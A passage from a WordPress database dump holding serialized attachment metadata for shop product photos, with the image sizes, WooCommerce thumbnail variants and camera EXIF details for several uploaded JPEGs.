;s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"IMG_0017-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_0017-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0017-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1430814720\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:8:\"0.003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11946,4936,'_wp_attached_file','2020/04/IMG_0018.jpg'),(11947,4936,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1537;s:6:\"height\";i:2151;s:4:\"file\";s:20:\"2020/04/IMG_0018.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_0018-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0018-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_0018-600x840.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:840;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0018-214x300.jpg\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0018-732x1024.jpg\";s:5:\"width\";i:732;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0018-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_0018-768x1075.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1075;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0018-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0018-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"IMG_0018-1098x1536.jpg\";s:5:\"width\";i:1098;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"IMG_0018-1463x2048.jpg\";s:5:\"width\";i:1463;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0018-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"IMG_0018-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0018-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"IMG_0018-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"IMG_0018-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_0018-600x840.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:840;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0018-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431252075\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11948,4937,'_wp_attached_file','2020/04/IMG_0019.jpg'),(11949,4937,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1536;s:6:\"height\";i:2286;s:4:\"file\";s:20:\"2020/04/IMG_0019.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_0019-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0019-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_0019-600x893.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:893;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0019-202x300.jpg\";s:5:\"width\";i:202;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0019-688x1024.jpg\";s:5:\"width\";i:688;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0019-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_0019-768x1143.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0019-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0019-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"IMG_0019-1032x1536.jpg\";s:5:\"width\";i:1032;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"IMG_0019-1376x2048.jpg\";s:5:\"width\";i:1376;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0019-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"IMG_0019-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0019-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"IMG_0019-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"IMG_0019-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_0019-600x893.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:893;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0019-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431505032\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11950,4938,'_wp_attached_file','2020/04/IMG_0020.jpg'),(11951,4938,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1536;s:6:\"height\";i:2175;s:4:\"file\";s:20:\"2020/04/IMG_0020.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_0020-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0020-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_0020-600x850.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:850;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0020-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0020-723x1024.jpg\";s:5:\"width\";i:723;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0020-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_0020-768x1088.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1088;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0020-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0020-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"IMG_0020-1085x1536.jpg\";s:5:\"width\";i:1085;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"IMG_0020-1446x2048.jpg\";s:5:\"width\";i:1446;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0020-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"IMG_0020-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0020-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"IMG_0020-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"IMG_0020-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_0020-600x850.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:850;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0020-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1432548952\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11952,4939,'_wp_attached_file','2020/04/IMG_0022.jpg'),(11953,4939,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1536;s:6:\"height\";i:2304;s:4:\"file\";s:20:\"2020/04/IMG_0022.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_0022-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0022-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_0022-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0022-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0022-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0022-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_0022-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0022-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0022-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"IMG_0022-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"IMG_0022-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0022-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"IMG_0022-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0022-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"IMG_0022-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"IMG_0022-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_0022-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0022-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1480761825\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11954,4940,'_wp_attached_file','2020/04/IMG_0023.jpg'),(11955,4940,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:615;s:6:\"height\";i:1018;s:4:\"file\";s:20:\"2020/04/IMG_0023.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_0023-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0023-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_0023-600x993.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:993;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0023-181x300.jpg\";s:5:\"width\";i:181;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0023-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0023-615x300.jpg\";s:5:\"width\";i:615;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0023-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0023-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"IMG_0023-615x550.jpg\";s:5:\"width\";i:615;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0023-550x1018.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1018;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"IMG_0023-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_0023-600x993.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:993;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0023-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1486093081\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11960,4943,'_wp_attached_file','2020/04/IMG_0026.jpg'),(11961,4943,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1536;s:6:\"height\";i:2375;s:4:\"file\";s:20:\"2020/04/IMG_0026.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_0026-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0026-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_0026-600x928.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:928;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0026-194x300.jpg\";s:5:\"width\";i:194;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0026-662x1024.jpg\";s:5:\"width\";i:662;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0026-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_0026-768x1188.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0026-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0026-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"IMG_0026-993x1536.jpg\";s:5:\"width\";i:993;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"IMG_0026-1325x2048.jpg\";s:5:\"width\";i:1325;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0026-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"IMG_0026-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0026-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"IMG_0026-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"IMG_0026-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_0026-600x928.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:928;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0026-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552205941\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11962,4944,'_wp_attached_file','2020/04/Long-kale-pesto-scaled.jpg'),(11963,4944,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2560;s:6:\"height\";i:1134;s:4:\"file\";s:34:\"2020/04/Long-kale-pesto-scaled.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"Long-kale-pesto-scaled-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"Long-kale-pesto-scaled-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:34:\"Long-kale-pesto-scaled-600x266.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Long-kale-pesto-300x133.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:133;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"Long-kale-pesto-1024x454.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Long-kale-pesto-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Long-kale-pesto-768x340.jpg\";s:5:\"width\";i:768